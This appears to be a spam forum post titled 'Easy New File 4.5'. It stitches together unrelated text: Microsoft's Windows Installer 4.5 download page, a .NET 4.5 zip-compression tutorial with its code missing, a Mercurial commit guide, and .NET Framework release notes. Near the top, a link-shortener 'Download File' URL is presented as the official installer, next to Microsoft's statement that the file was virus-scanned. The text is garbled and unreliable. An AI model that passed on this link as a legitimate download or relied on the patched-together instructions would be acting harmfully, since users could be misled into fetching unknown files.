Easy New File 4.5

Niccoletta Vullo

Dec 1, 2023, 12:05:49 PM12/1/23
Microsoft Windows Installer is a component of the Windows operating system. Windows Installer provides a standard foundation for installing and uninstalling software. Software manufacturers can create the setup of their products to use Windows Installer to help make software installation, maintenance, and uninstallation straightforward and easy.

Windows Installer 4.5 is released with Windows Vista Service Pack 2 (SP2) and Windows Server 2008 SP2.
And Windows Installer 4.5 is released as a redistributable for the following operating systems:

Easy New File 4.5
Download File https://bltlly.com/2wHlgY

The following file is available for download from the Microsoft Download Center:

[Asset 4009805]Download Windows Installer 4.5 now.

Note Check the following table to find which file to choose for your operating system

Installation of the Windows Installer 4.5 package requires a reboot to successfully update the required binaries.

For more information, view How to obtain Microsoft support files from online services.

Microsoft scanned this file for viruses, using the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to it.

In order to use the new functionality of the Compression namespace, you need to have .NET 4.5 installed. I built the examples we are about to see in the beta of Visual Studio 11, so if you download the solution file attached to this article you will need to use the beta as well. Also, you will need to add references to both System.IO.Compression and System.IO.Compression.ZipArchive. Simply adding System.IO.Compression as a using statement will not work until you add it as a reference too. I also added using statements for these two namespaces, as well as for System.IO for the sake of simplicity. With these steps completed, we are ready to start coding. Whenever you come across an example that is numbered below, you can see that same example in the source code attached to this article. The code will have a corresponding example number above it in the comments.

To zip up the contents (including sub-folders) of a folder, simply call the CreateFromDirectory method of ZipFile. You need to pass in first the root folder to zip and then the full name of the zip file to be created (which includes a relative or absolute path). Here is an example call (this is Example 1):

Sometimes you will need to open up a zip file and read the contents. The code to do this gets a bit more complex, but only because we need to loop through the files contained in the zip file. Here is an example (this is Example 4):

Above I showed you how to create a zip file by passing in a root folder and the name of a zip file. Sometimes, though, you want to specifically choose which files to include in an archive. We have seen above how to loop through an existing archive. We will do the same type of thing here, only we will add the files instead of viewing them. Here is an example (this is Example 5):

Basically, we are creating this file, adding two new files to it, and then the zip file is getting committed implicitly (at the end of the using statement). Notice that when I added the second txt file, I set the CompressionLevel for that specific file. This can be a choice for each file. Note that we are using the Open method with the mode set to Create. The mode options are Create, Open, and Update. I had mentioned above that when you use the Open mode, it is the same as the OpenRead method. Here we covered the Create mode. The last mode is Update, which we will cover next.

The last Open mode we have to cover is the Update mode. This is both a read and a write mode on an existing zip file. The way you interact with the file is no different than the two above methods. For example, if we wanted to add two new files to the ManualBackup.zip file we just created, we would do so like this (this is Example 6):

I added three new methods to the standard set you get with the Compression namespace. I will explain what each method does and then I will put the code below it. If you want the entire project (which is a DLL for easy use in your projects), simply download the code for this article. I have attached both the full library and the examples on how to use both the Compression namespace and my improved Compression methods.

When you have opened up an archive and you are looping through the included files, you need a way to safely extract the files in a reasonable manner. In the Opening a Zip File section (Example 4), we added a bit of plumbing to ensure that we were only extracting the files if they did not already exist. However, we have too many lines of code and too much logic here for something so standard. Instead, I created a method called ImprovedExtractToFile. You pass in the ZipArchiveEntry reference (the file), the root destination directory (my method will calculate the full directory based upon the root directory and the relative path of the file we are extracting), and what we want to do if the file exists in the destination location. For an example of how to call this method, I have copied Example 4 and replaced the plumbing with my new call (this is Example 8):

Note that we have selected to Replace the zip files if one already exists and to overwrite any matching files inside if the ones we are inserting are newer. We are also setting the compression on each file in the archive to be Optimal. These last three parameters can be changed to fit your needs. They can also be omitted. The values I specified are the defaults. The code for this method is as follows:

It was brought up in the comments that it would be beneficial to see how these zip methods compared to other commonly-available zip methods available to us. I thought this was a great idea, so I started investigating. To create a test pool of data, I created 10,000 text files that each had 10,000 lines of text in them. Text files are easy to create and also easy to compress. This gave me a uniform base to work with. I then tested my code against the Windows "Send to Zip" and 7zip. Here are the results:

I think the results of these tests indicate that the use of the Compression namespace in .NET 4.5 is a very viable candidate for all types of projects. It competes well with a great competitor and the fact that you do not need to rely on a third-party library to use it, in my mind, makes this the obvious choice for archiving files.

The System.IO.Compression namespace in .NET 4.5 provides us with an easy way to work with zip files. We can create archives, update archives, and extract archives. This is a huge leap forward from what we had before. While there are a few shortcomings in the implementation, we saw how we can overcome them easily. I hope you found this article helpful. As always, I appreciate your constructive feedback.

After pressing Create, Mercurial creates a subdirectory inyour project folder named .hg. This is where Mercurial keeps allits version data. It is called the repository or store, while thedirectory containing the source files is called the working directory.You never need to specify the .hg directory when runningcommands, you only need to specify the working directory root. It ismentioned here just so you better understand how Mercurial works.

Write a commit message, select the files you wish to commit, then pressCommit. Your previous commit message will be in the message historydrop-down, so you do not have to type it in again from scratch.

The Commit task tab in the Workbench gives you a way to see differences withinthe files, or you can use your visual difference tool (kdiff3). Mercurialallows you to commit many changes before you decide to synchronize (sharechanges) with the group repository.

Folders or files in Explorer marked with one of the icons below are another way ofindicating pending changes. You can traverse the directories to find specificchanges and commit them from Explorer. Though it might be quicker to do thatfrom the Commit task tab in the Workbench.

The sample transfer, scrubber and time domain tool, and record feature will be especially helpful to sound designers and mastering techs. They allow far more flexibility twisting and warping sounds and capturing them into new files with fewer steps and less fuss.

Support for decompression by using Windows APIs is enabled by default for applications that target .NET Framework 4.7.2. Applications that target earlier versions of .NET Framework but are running under .NET Framework 4.7.2 can opt into this behavior by adding the following AppContext switch to the application configuration file:

The application configuration file then specifies a concrete implementation of the abstract System.Data.SqlClient.SqlColumnEncryptionEnclaveProvider class that provides the functionality for the enclave provider. For example:

For Windows Forms application, the previous workaround of setting DPI awareness in the application configuration file rather than the application manifest is no longer necessary for ClickOnce deployment to succeed.

.NET Standard defines a set of APIs that must be available on each .NET implementation that supports that version of the standard. .NET Framework 4.7.1 fully supports .NET Standard 2.0 and adds about 200 APIs that are defined in .NET Standard 2.0 and are missing from .NET Framework 4.6.1, 4.6.2, and 4.7. (Note that these versions of .NET Framework support .NET Standard 2.0 only if additional .NET Standard support files are also deployed on the target system.) For more information, see "BCL - .NET Standard 2.0 Support" in the .NET Framework 4.7.1 Runtime and Compiler Features blog post.

Configuration builders allow developers to inject and build configuration settings for applications dynamically at run time. Custom configuration builders can be used to modify existing data in a configuration section or to build a configuration section entirely from scratch. Without configuration builders, .config files are static, and their settings are defined some time before an application is launched.
eebf2c3492